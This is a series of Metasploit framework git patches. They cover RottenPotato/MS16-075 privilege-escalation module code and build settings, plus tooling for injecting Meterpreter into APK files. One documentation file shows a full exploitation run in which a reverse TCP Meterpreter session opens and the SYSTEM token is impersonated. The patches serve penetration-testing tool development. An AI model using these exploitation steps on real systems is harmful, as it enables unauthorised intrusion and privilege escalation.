z$)*H0u5LC0ZhrehyxgTP;U6VR0~570GR=Xh88mX!k18k)dUiMSoagwW+0sBQmFP!d zzN?%0A?U}unG=ukk4#ek0a`jWUjwL3>HLQzDKxHD6BR}8`#k0t+;}H9{ip)NphrTQ z++5%1`G+QHK%ACG+%(u`ce5>kUZk;2Q*Fm;d1PA(+hg5qtDx5?w){gg8bKRQHnp(1 zsWCrBP55OwDc@=}IF&&xWY&u13-HywV7xG*qJNj-wGYew6Yd z=tpPs7cJ;w+A!i9!M~v4Q>`{bcd0hN!zNZ6PB!_l3B%3;a?_7&^w7Oo&K|FU9S~^A1jv!xbX&^WK zC>O!dBOz+R)iC0zQH<8o$;9*mnnV)?)pG%Kdj{WZLp^K5h`$T`qZ&Td*$L>?5E{y` ziPeUa%?a4Jy4eWWJ>d)S4CNF2BbziZK}#dkv=`AFpplz?lw2D0EQsChPaKiw&X)Xj z@F|9d7s^bQ{HMFa$&QLuuCXCM&o2xXr!`zkqYiol#FM?S7nK1yR?8#%t0wHdLWgR@DIe(w%W~TsS8_{p$k1fB7e!0766m|!e$Abn$b@RIA9(p)rS0*1jK?)t#Jv<#@*^nX##SvMd#N9I)dQJt^ zJ(XtaUUx82s5D14CgkV&mBOT2!=)}<54{PZCc}R~HWIWPvaNxgoYj?evI~Q*hiJ1` z!+*l-C*rhJGH-)ep7tq}Sq$bPqfTLs@dNgAkw8u7BHU_(#1Ln#(2SdGRat&`?( zcB8dHuhaOEIsGVRZIt9k)u^pM@@qp=ndf(vR~ZPIpFFD( zUaIkH!xOp!t-Xv4{dili+I`4y30w|Lqpjs;Xk-ghGA4Q)8t9D|J!;pCFMv%?3U38Z?Lw1EHFPT0eudf<1w})@h*waB8ZJd$1HE41^Dhv!K^sms zC8!GF)~>jy`^eD4AnLTlM^D03rsa@b9@0wJ*il+J&IACub7V2(#W&|rhyA@%y0yB zBLs!CrlMDA!^x%iK0Mb}tQ={5QcbMdL?JkpVpif|9M6B8B##@TwDhGkQ*% zhDu2tgT6`QM^VzxiD+vy{uJ#6=uH~FQz^(KEsad8V7gypN`Cr(VB){6tCTb(jL=gc zYLtA&RMe-ILw3cmvuo@q%O%ivx&0_y9no=G8kyE3=(NU^N>B&A0dm#tU;hu~_~K1G zFFrm^8aPYN>B=Rg76#ozr)WJt<4Me!8ZJej20aU6cl#4ZT|9WfCtpcm?jCm_MMMdd zYYfQG^ViVk((Q8jCMGEqF2UB#Ew{YmH8Ba`;LV58t zoHkP+{U{&VAn1AYG^sx?PLsR_6lo%$@KWe|a`^!m8?<3$pH+zit%gr|t%u$OX;BcLl>H4o|2C9lz14yDtEbh0&el&=El_QibjbQCHpP4cCS zNkU{5jy!H6k?3^v1oT=+GbC^c#y-Tum6U}=Pcq4aslbOON&XHufk+gI44sTgr-AN? z7*A1mkY6%H9n~s_64i!zxd#RL(@&d8)d$A_O5L6AY>#Ioj@h&X^5}$gEYlvu$Zrpf zPiQht%}@jV0z{pG_?I(KO)k`}g$z8uS{QoesR?*W82j?hAJ;$Af!Q&bJ z8jkdCPfC=owY5X{#}2t0+nLXhsIL#41*gZ7x_WgtD^D0<4Pt20@F`a==w8dTsqwzEu%6QL$hHH%;?g6z=|`1ohMoq|niEg0+*mE0Oz2aLn>0~SDR)8N5AiIW4k@V* z)zYYY)PPdwHa(4K)Wb>a3AY!;PQNAuwQKw+1z%hn4TN~io0JsBYH4I@d>u^y8oBAG zGy(KH#gwm_BZcm?AX_0%L8>9&LW<8Y;UMHBS3c2Y`CKw?z-*hlxI~?VZ^N`DszUP?`2bmAq1UU}50P(J2LIh+Q!~v;< zI3a`ILhV5IKu$uwg!Fiu38Nqx5C`Nr$XgI6r1v{aNPuKRHr$TC0}y;cR=`WU1iX_= zz)PnDya!6a`;dg$b5iDf@yDaY^!0%$Ne{%(A@I0)xC&5y z45`_d7TLq^pj$*j6B>IL?wF{4MM6Ps<@$NjY|)X9J5giTgo1ViFlchkWZOXQVuU7+rnLvkV1(sRdaLV0X*df|FO$S4_6LbfqNw7 z-iX_eZoCPR@C(K;cl+U<7qXiA5PxsJ6o>cRiwmS%e23v9s3@-xxf=TuhWgXJ5S@(b zlPN%%W;6kTVXxtveE5w6dMtNo2y%`)fGn#t0fBqmmT&w6pCm)nG()#)2m#d~z)v6o zC7}@c*QL^6jx$)_fH|ks@LPeNyhZR?3#1`^M!LPI9NFYGm}4iuSE$RN?jqh_h?xRm z$APtwW{7Yn|KV0CsOJt3hyQe|M6Vwonk@~+hmb6Q5no2D5qKhsyc35HL}UUA5Xx{0 zziFY=f7G9GH&XKuOl7nK_qgd$g&c)0>iGvqVA!$v8?8>et?D|hc&~+0kXHeCJZFvM zPcy2posVBA4e{s@`J5s`R$QQ+6^7HiS8 zm~O3xunU%y#9ns{RJCReK^~xqx=<4kn2i9+*m8~KAq_!3qv;a$+JHASQMS7Sl9x%k z8J_wu+0`~q0a6=N2I;CYp|&o{Z@;k~3*B~`6gz(EHYq6N$vf04n)im9T~Ftyg6`+J zi=-hTubx)x;B_~?5A=+WI)&252y4$^)A6CVNkalI{!N5NHE84C1m!D1eLTt2I60(v zg*>KVQ|UYu>bkY6RjNBjWaY)rIk4m!|slN>HBx8g`z_E_N5K)Ez{n-=hZI zq)Fa0sB0)l9l@QAqT8T0ia*fPD0FR`GNEmh#-bY=CE0D4rr7cO7E3{a72s%#O6AH& zIQ855#geaAm0O{yaPf8IkW%S!hAHPCHvy>t!9c2{n}Ia97=Sc5EkHUlr2>6`nLs-K z$OF=Lsx@v@uJA#>=@Y(ai8L%wF2bF5_mmq3H|0tXJ$0!RG~&6_H@30K%}G%>YM*H1 zIAQ7^@c^ilvtj4D#vke0UY-LpPj!avM-iy3iD^(IA%>mmOOQWaY9}zHC`AW4xTWf-xMZ~iqW=}J(@Ynlkj`kXsWDsu@@)Ug=iX_NX*YMV3yJ!7$s z|CBHF57qgo4_11px_jKi7Kr9skS_)GulL52id0GN-{%8Ge%lghXrLY>Pl1x*rut6@ z^01|ne`k-_4NdM`2&5b?mx97d zz@ds*fjXm1t^;~9rUwtbW#3|{=fLxSt9(VS?AHd2f~BYJYcv6Yum4Re zxio};S$~seIDc?CTG;+KL0L*rpLaCr?NYrCYrLw|2*PUqTApS#=tr=rCVqEYQ3C|> zSu2q2fxodzQ-b;|Ly)JK#VY%jzhNJzpl*H4Rjf8kJJ8d|@{~R{;K-4XEL16%+{L6yspdDWM5Rb? zsX={#o}P1636lTg_M%P^v9)XJkw4M|WON01DJyh3q8#n=)bYagl9w5tLLSU0t^y$G zgfwzD0BMfj3Z&e|0X>azK@(G-=QRPiXn6-_ouO}caU)f)6pdGw>UBWlRib*W)_7GY zUI7x`&rIoird+C}MkOf3GhH>oN=u>a%lze4sK}A9h9-;!dMYxFf^brR)$mXXo3l%8 zkBq-b>5vi)4=$8~O;=0Q4b61BgY33HaN|VO2amye(x?ZQYPAWd%s)Y%DJ^xox?Iiz zx|e#77h+X06VJO+As%w)l&tOGxDPE}lwW-3s8I4<+<-@2y)ji&COoTje1BM3Ws`pS zJyE_6p>R*Kt?p#ofq^@^dOBUuA|548NUQYM-r|eyl!B6f#IwER=ZPZ)c2xc88hg4< zM;xvF1-IQktUP*peJaX2h%y??u1vk~3a4(;+MjDwi7Lgm=iFpcStBTyr-fdhpf&HC+@%c)Pf-;QRog)+3TYa`m6J~;rCV?P zpXo=kyW$R%zFeYKp6>d6TJNj}87&1uco=3kQ`3Fwc%|KWl;Tr(mv=Hb+`sRjdwR}k zaH;3i0o4`r6ugIgvX6Y_b+{Cvzq+GE#|IQ&zPRjP4qr7?|W3~Eb5`5OmJELIjczRJ4*6QS* zywskVTd;1au%5Iz9?i~gFP4^zAMlTgrGTWZ-g8&w=dQ{tSeiG{^B%29%M0vF*Wkjm zH;n$<;9Nd*i*%%q%L^ps#ZI`g$UoX54IG&6J!kptt8xowE~ZP@<5%U)%Uy04VtL0F z>77AiC{i`gioAUbN9*{Rps)3cq?vv8IryP0*`)~diakziZXK+Ib z+`pAd%O2^S0DO?f`)O&SlsG!+xum+JPm)HN z4Q4+}qGgID-?G{AgymJsYnHQ?cP;<42-aw8mbJvX)B1$USFKkV=b{h&DhIJaiN8d+3TCdmV>dW*m>M!cA>3c_qI-;YaP0`lqh0)8S?}>gg zI>d0RVWr`2Ly2Lx;aS5QhPMpY4Bj!4QF^d*I zORyyh8BDkAvAl2j)#`7Hv*p?ZJ-Q5zHK~a6?dX>1aKkLaU50&zqlQa{Uk&Lo_ry#v z-fH~8==ja(6`L2EAGbBGG;Vj?=W&OzEc8rmdz&O{YyCnm#vOF?l5vB;23yLPB+dS7KyhR$@uwKN7u?#w9&ve%}0w z`8D%dbB*~ubG`Xf^F{O5=I_n_HvepHGha7*S$bOh9F_pfU`v=~q$Sc~u*6#|mRnHO zGb|aF1(qDkQp-xqot6!jO_r^eQp^38hb@ny37)b%XQ{B9w4An_v%F*Z!19Tu!Sbc0 z+46(sN6W94KP;lPhqbr0pEb}LVjXTBWgTZVS`)3w)=AcB)>+nh)`ix^)_m(KtKE8+ z)#0#ix0YG=Soc{ES)a5%V|~H;s`WMN8EcL8J!`%7U)GD(udUx(TdhA^+pO2ElC7uB z&lX?{vW3}3+9GYyXmN|}7F()qhAqRkz;>H$scoh0PTP9hCfin9scpCIVcVm&Cu~P; z&)F($CvC6W&e`6vePH|8)?oY6)@*BW*nYJAYWu?`B;#mIYXf}`y|2EXexN=?KU_ab zKUQzlC+d^+6ZLcS^YwZ9wfejCJM@p}59*KUEA?;aKheANf9P3sSoG-V3DI+-Z;f6R zy(RkI=mXKuMOQ?himr|RF#5~rAEI5+zeoET`Wc28Mj2uZ35Ht?)6vs%4UP?l#|`HU z7Y!|j9}T}7ddB$042v@(CO>9v%+{FFn8#yYh

U?U;s`uVY$cuE+Qo z1B~Iu(Z*O~igBuOfpNKUwQ-|yr||*f0ppv-4~_paeq&6EJr;W*_Ul*{=MxteHzLju zXOG(y_f*_Vaj(U_ANOtCn0QNkt|NY9{73QM#rHCWnxai5=u{o1;R%%qmlK91wkH0X zC?xqL-JBGa6qA&YWJ{Wul$JCnX+ctMQhw6vr1eRglXfKCpL8JUNYb&S7n7=z-c0&9 z>6@gVlm18wH0#ZA=Beh}&G(xhGe2#9)%?EM+tOF*Z9_3$=2(`Y_bjzKwp&l4bpveS zXvte_b8LCGjkX7EPupIwy=r^Q_D>qW>A2AZh(bf;>X+-cV)X8cJ|2BC`lIMCqQ8p% zIl70Tw;|LJZJ1$r#BjuL#_+CTVa&3aRWZ-SoQZiW=2v%pg&L!cbB)!;zOmzDvtv)i zw#5Dx8}Epl61P3>vADP6{u8%4{)PCyCX?w_Q$8l7yG>h651S5}j+;)H-oQ{RO86k5 zPhv*m;lzxjhm+n<>PU(-k2l|At}w?~@+^bU!+*2(w~eu-*zQC2-?d$`2|3t0hm4DQ zfBoC~farwi$D+TD?rYd=FvQG_SswFL%quaD?_;jUtTjf)*2aDp+ZH=GE+_7exHsb7 zjr%E1j@QRek6#pD5$}xuCB7qmHL|qL^rLA?!qW*-qA_t+VqDTKNe?DHn&fYe!stGM zS@9c7pfv@UU>phqqAFw`xvGpQG)mzrDFot|>i5M$)VO+dyd);BXVEf)C z6jC-J==~%0F?x%BmVTvvo4!Hr#GljdJ~B=r9b4Sr^lULD&(~(->l$Xk2F8hm7lD2gC-)4v(#ieG*d^ z;@hJhbW&prV(*UK9(#Z66R|JG{v&o)+*@&X#BWfFQ6B$HyyN5eOYz^v{}Eq>p>_&` z(+x|SrHL(L}hY|H{%%ukq4p=dvu=i`_n zS$kOnaBPUTI{s<>!FtWQ0{wA6HAA&pZC?5`{c8O~`hVzu(|bjSM&B0wqT$Y%>X;8= zuEdNt&M@AFd9KwM6FV*TDa>z|dc%oXU?2+W`?|IROFJ8OGe2W78Mm48Jan4l52@Y?ORaG7AYCm z*p-Y;O1fcEVoOTyTcJ@=QMpD*MTUj7&%AW+=YH;Aw?E_`d*7M)KHulpdF9o8y&BuP zQEvr|caXdL2r2GusM<)`fK`L z{e0tR!zNdg2S}Lw8638cd_aC62K_Cqpc`o?{eX^OS9I*j?IvNl>7)pC96bG>8~26LP;|)!sRT?w)pHMYbsv$L2HLK zY87*zPqWX(OU{H9Wwx+gd$v8-uCO1okJ?q@buj@tw@1D&pH#Owe{;Tbw+3&N785GO zk0$VBr&gp-h7?_DB#~L<0a{C+r+1kznAz+eZ2k%iW`nf_T=q$=XON;0obPaukZlJHg4;;gAE;a8pA2zp|Z<;ai1G(%rc0b$Uv$xqX zR%%sQ>#ZknW$##DfimKF5}(QQ`8wXjU*hlMI#0AOwr{dq>^JOp?86|CSTRYQB{GC5 zTyd$mQY;pwV!2o?YQz(wS9~Bo5nsSP{36E5Bzd|_ljq7z>BviDo?IZ8$lK*zay>jl ztMuQLpUH3J@oFkIa}KzAEzH6W)rTcHs>VC#JF^_-NN2WlnRAVEgL8{h?yPXuIgdH5 z&Smh6Til)Q1Hn_uiU}3q$J<)6K2Lu}e+cV(7P*UjL?@Yt&GBp!b8yEC+11vK(2q-a zn7_$0Y|k$A?Nzv|7wuk1$35a_ktFx3(;O2HxX-EZ{_KVF#$LD_5E`!^)n^zN8ac*O z#>>V#P`Ma#5*Xn;@>{IxA!3+Mo6oQ%)-vl+>l0pR@3v=%N5vd@ul!uT4+@{<=D_BD zQo?x3wgPniOX#~~233-nR1<_B}+w>mX z#2#GuQnH6M)2Y6>kmd6g{1_jwk0C(J!aQ?@2fn&Wt%GyhtoA^Ta^Vt!U#AUG3tgmN z2NyG>Cm8FDmyCCfuZ_J>^$9eYoYfAshG}F_E}=3I3Om<`SMBmqMW3Z z6YD0s@3~jN-T%c4)r?)xnOY{yc^TB=aqVO67cEi01+={#yE4u2jFm<+F7qqna&jHH zo4ibRkra651+rMoN34%|3V1smi8#~N>^1g3 z>>fJ;koMW->W}IfaNO_RI^^C)x5;gGTioNkOT9d}x&p5-09VJ@8-9-=RT>o}k!H~x zq=XybwSJ=am{sQE=5BKUyqf8Y92m)1IY~~2a?h5(!)~qt1+~hT!KtGOx{ ziT74jp;oIf-hQjvsWP2x=MtpD8NnO&#DwbcV~#$LyiM*ili77_Da*0?`O`3~Z`<$M zr-Ch9w-T!dsxwpHk;dLK(pLE;dbf_&|EIk=~Pvf0+f)?&-I8ZG}t;QfeoGEe0NunsTqxAs6DAsFM-p&vK?akKnQ*&PNWG7XQVD8u91x zh_!}(iGCOC><0Z={dt)89eTH~_v<>i?4a?3kwR`KE6G2g>NDt0dVm&~_3*3%2ueq= zwJGcZb}homQnnhx5oY!5S@u`f#{P?Svv*)Ne`LR~cdhTOAFZt@C4wra60)|>{s4M$ zgII*oyoNY`hIf{C8DicNZ?(4$QQUve``SC=g>Y=ug{z!``OHE1SOmKLllG*x5ixtG z_LlZ9jOZxL=w$tD-NRk{R?pXO)0gXy>J4D~%`j>E^sm8eKkIQuxiBV^? z8@%JiO?I(qf~$z7>gYw*HeI zYn*Rn<6;&YwMG-N(O#n;QU6SMgNxy%77_nOn5la5JlRe@L_B(*Z-O2U%27F9O;YD8 z9WyR=Z*!k>UxCt0Pc96`+u!|uvUQ847 z#SP+4u}Zuk4v93h0I$oVGELpA9&*CY6TtpKXFO`SE8GL9X})xSbkFqW;}W0p-axr> z7_CZd5G_Kb=uK8&qz`I)wLT2DRzd;$z*-lW+st>(iCCix+2vTGU)Y%#g=<}7-EAGRPT`6#_! z3jD4^wNTv%VhgK!^}6a-2VrZDLtpqi=UTYO*Bm|QKgOddhz+IVF^$tkv^l6C*BC8$ zB6G+pxc|Rn84uYDM5qj(1;^hx59YE2Vf1nHLG~DX3u3k3p5mlC7eMb%@bG)Iy~n&g zz{a=1?pMZ!f_xFLou*{~8@bxG(8+tXu(nCth0O7#cFfl%>N&=P#&6(aZXmTJm;Q`L zU0`lDKQO1U4%84Yqgb3O&Jl)KBJLAg#BDIz8|7j7vz&s4=RzpMe04RPLKlj~qv&{2 z&>}8|NqZI1^*!fP=ZJHq#OeB)Llft-s1?;i+qKaq*3?{?4+=`!YTwZ_|d_6obz zJ^)ia1*r9b+P}j@PmmfIe>J4I57E&Bj5gyDCt%X^AiH5_8!qH~=MgjkUFg2Y7Ox44 z_q7-57z6P_DBK>vc(Sha#rk>_lJCP2oNdfS@mOnY1??ZZ*hoXwcr&TP!hKGDLj`)7 zhv{zmBb{O9nHx|`4VfuSvg<(>?d(0U{1od_>sIT2tJ&IReS+Tb9G-ZqR4$&#PM7N0Gp87<;7!U_hEe?rMwA2YQ5dk4t)?h{Iuq3sS zopEWwZ*U9Y!}Lf!wH>d_qD>xQN614#{f!@(&5K2Z~n zsa@3-r)?YVj4OxMG&Vg$v(26k7GOa?ZL^W2U)oBgTrxvXZ{=G}< z(Rxvm9Yl^F(L#Cxs)Q8O!Wp`T1BPw&Z^Tu_To=;tF@L;rr`zpD+&)w{gYGcun|RbW z|G&$}|D1(y;lYm~KFmk>C?asYonR;0Np`Z`Y`4^Y*%3FzA4JPDjJ!Vz8jlwVB2grX zWRW6LMWHHEC7_}n)vJb7$ccB7v9hUP5CylDhtj_oCoN^D`|F%~z`X@Ys~v7)08~HX zi~{KjOMvH2#p6!bGxcoU&({m|61`L}(<}5Ec!WkIf;PQf@6`MBL4=o(5pN_$ zodQRk%Y|RaHwuk%Xwh1DhI$;+v>V+<55#%^-eCyKn?h1aCeff#isX}GH1icOOO

|8Ke zfn8=-`gRpqw9c-#8=;2X2rvEiz^{Oe2M9BTCbC2}vPT}2vJ^*FVNiK9C}WH)dO#5) zAc!$?NI`$VWe(0B3T2TjM%7a#!?F(jL9=YZsY8$KmjiNGj=(m>t5lV#d`)GkY?Y(( zfb|NsQdO&fVd_;Y&ceEY{66H2gFt^0(4X#P;P8tA{e?h(85)KPrxNII0{YvX4yV)U zj-o&0CLw)h0R0N+&vWx}`dAc2e>j@M+T9MESVhpt_WL-jO2AGBxYs~PJW5H0z^z7_(dtviO^ifoq=|+Z;X=K5a<{JfY5~VrxJv%;)F z{nu=^!@70?^?l|bkUxwgl2O>$RF=s!mc_DvRfA$2Y*n)w)&TrBv6cY;y{wN70{_Eo zlqCcE85Rfrv#f0FKyeiRYprVRKpoCkI&h-Uji5jLEB=#s3b3EWvr&Ns_%8M!p%?02SSUV!Omg_NfB;8|*gVzr*eV{*!(UH`i5H;@sRX~(L>aCDairadARYA^gP3$ONh4XX0{NJ6CF}_l@+$SgT$SLhW^h&n zvpZ-efUzjpDu`&Tv#v z6G1E~pcM*Y$%!8Gtc094K}aJ}caQ+>{J+@gf?f`deY~L(U+V|nNQGKzQIk@v`BiWy zfiLOAxx!$SC_;KN1Tv7vz>nl2KNlj{lz=d*aMTgTab5$U(+<>hgDpmYnndsf2S*eG zGfiNJwkR|705JnN+)Dy4D6m2a_#hk&Mg7RH!z3A^m+n&yJzxRAQU|STg4PXT<3nZ= z&dAcS>)BC-%f~Tnu<2D%eT!hr`+=0PEe`=Nsn~IjEf0KOK5$cok4OaD-5Qm)V7-%~ zvKEM1fmLLc05j#*TC2%g+-Y^;)HDG#b}}|O5BjwdFlj?V96__jp;8r)r#3WdBX)}5 wF#8n{pf=2Y0N!*|B*2ws00D(KL#)R9n;|p(5SJvC0#zx- #include #include #include "stdafx.h" diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj index 96f341c9bd..3b69b6ed68 100755 --- a/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj @@ -47,7 +47,7 @@ DynamicLibrary false - v120 + v141 true Unicode From 9a45c66db42b5cb1fbb4c32222cf0daf80e758b3 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Thu, 4 Oct 2018 16:38:35 -0500 Subject: [PATCH 174/192] Fixed check to you know, check. --- modules/exploits/windows/local/ms16_075_reflection.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms16_075_reflection.rb b/modules/exploits/windows/local/ms16_075_reflection.rb index c05d328767..241016f004 100644 --- a/modules/exploits/windows/local/ms16_075_reflection.rb +++ b/modules/exploits/windows/local/ms16_075_reflection.rb @@ -107,7 +107,9 @@ class MetasploitModule < Msf::Exploit::Local my_target = assign_target print_status("#{my_target['Arch']}") verify_arch(my_target) - check + if check == Exploit::CheckCode::Safe + fail_with(Failure::NoAccess, 'User does not have SeImpersonate Privilege') + end if my_target.opts['Arch'] == 'x64' dll_file_name = 'rottenpotato.x64.dll' vprint_status("Assigning payload rottenpotato.x64.dll") From 523040e488c9edc781cd27a88293ab42a57a8972 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Thu, 4 Oct 2018 16:42:23 -0500 Subject: [PATCH 175/192] Add note about compiling problems --- .../windows/local/ms16_075_reflection.md | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 documentation/modules/exploit/windows/local/ms16_075_reflection.md diff --git a/documentation/modules/exploit/windows/local/ms16_075_reflection.md b/documentation/modules/exploit/windows/local/ms16_075_reflection.md new file mode 100644 index 0000000000..a726d11e6d --- /dev/null +++ b/documentation/modules/exploit/windows/local/ms16_075_reflection.md @@ -0,0 +1,65 @@ +## Intro + This module will abuse the SeImperonsate privilege commonly found in +services due to the requirement to impersonate a client upon +authentication. As such it is possible to impersonate the SYSTEM account +and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM +attack at which intercepts the hash and relay responses from RPC to be +able to establish a handle to a new SYSTEM token. Some caveats : Set +your target option to match the architecture of your Meterpreter +session, else it will inject the wrong architecture DLL into the process +of a seperate architecture. Additionally, after you have established a +session, you must use incognito to imperonsate the SYSTEM Token. + +## Build Instructions +This builds using visual studio 2017 and tools v141. Attempts +to compile with previous verstions of build tools will succeed but +the resulting binary fails to exploit the vulnerability. + +## Usage + You'll first need to obtain a session on the target system. + Next, once the module is loaded, one simply needs to set the +```payload``` and ```session``` options, in addition to architecture. + + Your user at which you are trying to exploit must have `SeImpersonate` +privileges. + + The module has a hardcoded timeout of 20 seconds, as the attack may +not work immediately and take a few seconds to start. Also, check to +make sure port 6666 is inherently not in use else the exploit will not +run properly + +## Scenario +``` + Name Current Setting Required Description + ---- --------------- -------- ----------- + SESSION 48 yes The session to run this module on. Payload options +(windows/x64/meterpreter/reverse_tcp): + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, +process, none) + LHOST ens3 yes The listen address (an interface may be specified) + LPORT 3312 yes The listen port Exploit target: + Id Name + -- ---- + 1 Windows x64 msf exploit(windows/local/ms16_075_reflection) > run +[*] Started reverse TCP handler on -snip-:3312 +[*] Launching notepad to host the exploit... [+] Process 3564 launched. +[*] Reflectively injecting the exploit DLL into 3564... +[*] Injecting exploit into 3564... +[*] Exploit injected. Injecting payload into 3564... +[*] Payload injected. Executing exploit.. +[+] Exploit finished, wait for (hopefully privileged) payload execution to complete. +[*] Sending stage (206403 bytes) to -snip- +[*] Meterpreter session 49 opened (-snip-:3312 -> -snip-:55306) at 2018-08-03 01:54:18 -0400 +meterpreter > load incognito +Loading extension incognito...Success. +meterpreter > impersonate_token +'NT AUTHORITY\SYSTEM' +[-] Warning: Not currently running as SYSTEM, not all tokens will be available + Call rev2self if primary process token is SYSTEM +[-] No delegation token available +[+] Successfully impersonated user NT AUTHORITY\SYSTEM +meterpreter > getsystem -t 1 ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). +meterpreter > +``` From dbfe67573dc2387b5c2526e5d5886464b8f874fa Mon Sep 17 00:00:00 2001 From: Metasploit Date: Thu, 4 Oct 2018 15:03:27 -0700 Subject: [PATCH 176/192] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 45 +++++++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index 82b89ed6f6..508f4dec13 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -113685,6 +113685,51 @@ "notes": { } }, + "exploit_windows/local/ms16_075_reflection": { + "name": "Windows Net-NTLMv2 Reflection DCOM/RPC", + "full_name": "exploit/windows/local/ms16_075_reflection", + "rank": 300, + "disclosure_date": "2016-01-16", + "type": "exploit", + "author": [ + "FoxGloveSec", + "breenmachine", + "Mumbai" + ], + "description": "Module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege. Currently the module\n does not spawn as SYSTEM, however once achieving a shell, one can easily\n use incognito to impersonate the token.", + "references": [ + "MSB-MS16-075", + "CVE-2016-3225", + "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/", + "URL-https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "URL-https://github.com/breenmachine/RottenPotatoNG" + ], + "is_server": true, + "is_client": false, + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], + "targets": [ + "Automatic", + "Windows x86", + "Windows x64" + ], + "mod_time": "2018-10-04 16:38:35 +0000", + "path": "/modules/exploits/windows/local/ms16_075_reflection.rb", + "is_install_path": true, + "ref_name": "windows/local/ms16_075_reflection", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + } + }, "exploit_windows/local/ms_ndproxy": { "name": "MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation", "full_name": "exploit/windows/local/ms_ndproxy", From 06700efbc4ed247f5b44ced6f4223df02fb8e37e Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Thu, 4 Oct 2018 22:06:32 -0400 Subject: [PATCH 177/192] Skip payload generate to reduce processing time --- lib/msf/core/rpc/v10/rpc_module.rb | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/rpc/v10/rpc_module.rb b/lib/msf/core/rpc/v10/rpc_module.rb index 4b837bef2b..03aa448fe2 100644 --- a/lib/msf/core/rpc/v10/rpc_module.rb +++ b/lib/msf/core/rpc/v10/rpc_module.rb @@ -47,9 +47,12 @@ class RPC_Module < RPC_Base # @example Here's how you would use this from the client: # rpc.call('module.payloads') def rpc_payloads(module_info = nil, arch = nil) + module_info_contains_size = false + unless module_info.nil? module_info = module_info.strip.split(',').map(&:strip) module_info.map!(&:to_sym) + module_info_contains_size = module_info.include?(:size) end unless arch.nil? @@ -62,7 +65,20 @@ class RPC_Module < RPC_Base if module_info.nil? data << name else - tmp_mod_info = ::JSON.parse(Msf::Serializer::Json.dump_module(mod.new), symbolize_names: true) + module_instance = mod.new + if !module_info_contains_size && mod.method_defined?(:generate) + # Unless the size field is specified in module_info, modify the generate + # method for the module instance in order to skip payload generation when + # the size method is called by Msf::Serializer::Json.dump_module, thus + # reducing the processing time. + class << module_instance + def generate + '' + end + end + end + + tmp_mod_info = ::JSON.parse(Msf::Serializer::Json.dump_module(module_instance), symbolize_names: true) data[name] = tmp_mod_info.select { |k,v| module_info.include?(k) } end end From 08c196c5d565ff4e07e08eed86d4c32857ddeb99 Mon Sep 17 00:00:00 2001 From: Tim W Date: Fri, 5 Oct 2018 14:11:36 +0800 Subject: [PATCH 178/192] show the output of apktool if injection fails --- lib/msf/core/payload/apk.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb index 964f8bf8db..c3e4d0f114 100644 --- a/lib/msf/core/payload/apk.rb +++ b/lib/msf/core/payload/apk.rb @@ -264,8 +264,9 @@ class Msf::Payload::Apk fix_manifest(tempdir, package, classes['MainService'], classes['MainBroadcastReceiver']) print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" - run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") + apktool_output = run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") unless File.readable?(injected_apk) + print_error apktool_output raise RuntimeError, "Unable to rebuild apk with apktool" end From d9cb052189747dcd48017c8acee57b3085c70381 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 5 Oct 2018 02:10:42 -0500 Subject: [PATCH 179/192] Fix improper use of the Ruby shovel operator (<<) junk would be modified and returned, and we just want to return the concatenated string. Practically doesn't matter, but it's incorrect. This was my first public module. I've been wanting to fix this since. I'm noticing it again now as I look for how I used Ret in a target. --- modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb index bc24157d7b..ad494d7be5 100644 --- a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb +++ b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb @@ -70,6 +70,6 @@ class MetasploitModule < Msf::Exploit jump = Rex::Arch::X86.jmp_short(66) padding = rand_text(66) # Pad past buffer corruption - junk << seh << jump << padding << payload.encoded + junk + seh + jump + padding + payload.encoded end end From f9e91438cd3ced0bd8a8422c3c612dcfba8cc307 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 5 Oct 2018 00:29:38 -0700 Subject: [PATCH 180/192] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index 508f4dec13..17b942b3d6 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -93986,7 +93986,7 @@ "targets": [ 